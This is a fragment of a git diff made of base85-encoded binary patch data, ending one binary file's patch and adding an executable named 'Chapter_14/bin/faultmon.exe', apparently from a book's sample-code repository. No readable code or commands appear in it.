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
EUj$R`umAu6

literal 0
HcmV?d00001

diff --git a/Chapter_14/bin/faultmon.exe b/Chapter_14/bin/faultmon.exe
new file mode 100644
index 0000000000000000000000000000000000000000..c135b645620658758535475cac760420b7d029b2
GIT binary patch
literal 65536
zcmeFae|%KMxj%k3dy<@xP0j)dtQus|MWF#34QS#9*+4b~CAdjQLJA3Z3u#QPMK}l0
zCb;n=n%%=Hy`{aawY_q&t^ILZZ)++3C?qURf=~@$Emp1urFzzb8U&Mtgq-jDnX?-L
z)xNyn&;7h!pFhlt**RzCnP;AP=9!sio_Xd_`ju^*mE$-b!7w;(H)8tpu-||Fa}3$(
zQ=d=go=y4lwB42^f1b9i;qDF2b?d+Rwe@#>!}-;_?!EV$lJj5II@inhI`6*MS#)QG
z^Bdn>v-XCxv~jK&>ZJe7KDOYHSB;0+N0+LFc<=1JLoG)<`{<pjOz-<0s+YkPsap^i
zeY8|vh`9XjuQpKG%PIAFIc|x?%87URZjI;laiS&FlEiU-q)@=$19|wdBW$BLkNJ#u
z;s^c3W6o|d^N>dTVlPyV3bS}LqC`&nF30)U)Bp0%Hjaz_6O=bdYd1^Cf3_JvM3+An
zBZ~hyId1h0>(|^R-NkVary><NFY+J`#kk?Q!35)q?nU~O2&-c;qWGVO<2vHcU&LQ<
z;0q3X!GSM0@C66H;J_Cg_<{ppaNr9Le8GV)IPm`_2b5D8p&}ROGcq@C^Kj}CSGu~)
zWmAh><62ITJ)jIpwwAZ)aXS5!Bim_a`N|r6VGmcX-QeOlW&f=3HvCnnD_ufWb?(64
zEHpU8-|~a(eTSo}?N3plcfY<NF|^sx6E~)X)>+(xTi#k#m)o%-tnz;vM)s<@72%4?
zs%o{#<!Cd+))8O;I+rq(AZ|TPFGa2lUnAFOH!^1twf$`aVk=o8)Y&ue9$MmZl!cbL
zW;F8U)m6q{+B(G6-yv54K3;5l+Qi_Z<R|c4kMt}~Z2d8wL;O`fEqpC7MV0-0n;~sM
zT`ocxT6Wb)S$VaO;gjkJSHgN=&$JT-MJ~tF7AdhLfCq5O3F5elvPPqt9_qXKWLQ-)
zivZcyQT?E(RiOsp&+S-MSGyvtEizws!?b|LBc)oKV<yG$Ba!i^$>l`59Cwsg#0hzm
z2(hgH>li}1_&mbGu&rR7f&M`MQkP^^nk=e9XU`x8&+<{@8trAd1JxA)$>kz;$xGDk
z>4wO0^ZN0#@zy<L6+p$avio<FEg`$BJhWtv!xzf9t*m^sl$2zVT(fk0ZU?wvN0_Da
zz&K02$CZ=&hI^&U-ZTZjvzjO8b_9#EGJFjU5SvPEa2hegreCvn4c?UlMsCN)zaBiC
zeNH{B4yqSABME1IqQ0b@u%3BJ8A_J<XJ+d*HLPgj;IS(^ls;#>H$nN6b)hn3Z+e`#
zr|i!NZ-aOW$|*aVnSlm!6;;(f>Pa-T95PN)lKTc4$_G}uoRy$(7ASLpvID^-S@yCR
zWwrl%lsyUN=YWD4kPcUck9x7JywRdPJB}Kk(biEbJNK?L+aGIvCt5#bw!Vk89^*pU
zZ#R1sXn2f}LjLDuvJu-t=$70gxdXxblIzv`5`w**Z`)H}%N?j!Z&c5#y)AEZoXDlV
z253JgrF6b+Yk7$}SnY3lmlHTnnmDjOK}vqE2NdX&p4(56h@|H_@FXWb_adUUfj!T%
zw>`f?)TyPFDSg%|Vry1;bwfMSd|I}Xnv=DvF1%Ml!sVUW<g$<LPJq!|L4Pf$mcYbT
zp+4bShPbjyU1+QJX}g9DL%qX>q0(|L5!NN?2K3oi_u9J|YLic3rB5YZosaPfeePrY
z(({#XWhJctvU-QJ?Z9&a3ZW$&BDKO*UgiVb%7*?fB3qiudVxynJQ`$I?^uZ<eaJ+S
zR}rZdHlMmsC|9?;?g4>i>K(kVti0jWpFEtl1ErCNcGIL(Vq|8~l)xsXCjcAT>hf7Q
zuDg{*$()5N!)SG|$w1DyWQ4cuCoY6{oQ%>;A-2AcUR7INwgg1;GFS;I0}akA$2|1c
zwhk%zkHF073ArBtOv5wMG9mCKWhOv3I)@-+fu8U{=uXDrFonkuAva?bE+Yo#K(#S^
zo{RV#qi~KGT;D}}GcMvIL#bIWO&L`0aTAUPWKIm9l)RU~bX%^W3mArWOiA|mTvoxC
zUp~n%u>#Xp7YE8h=qz7Zm39ruh{+?&A|wsvzJ^}vmz1jkyxjy|;#yf&UZs6<9>7}}
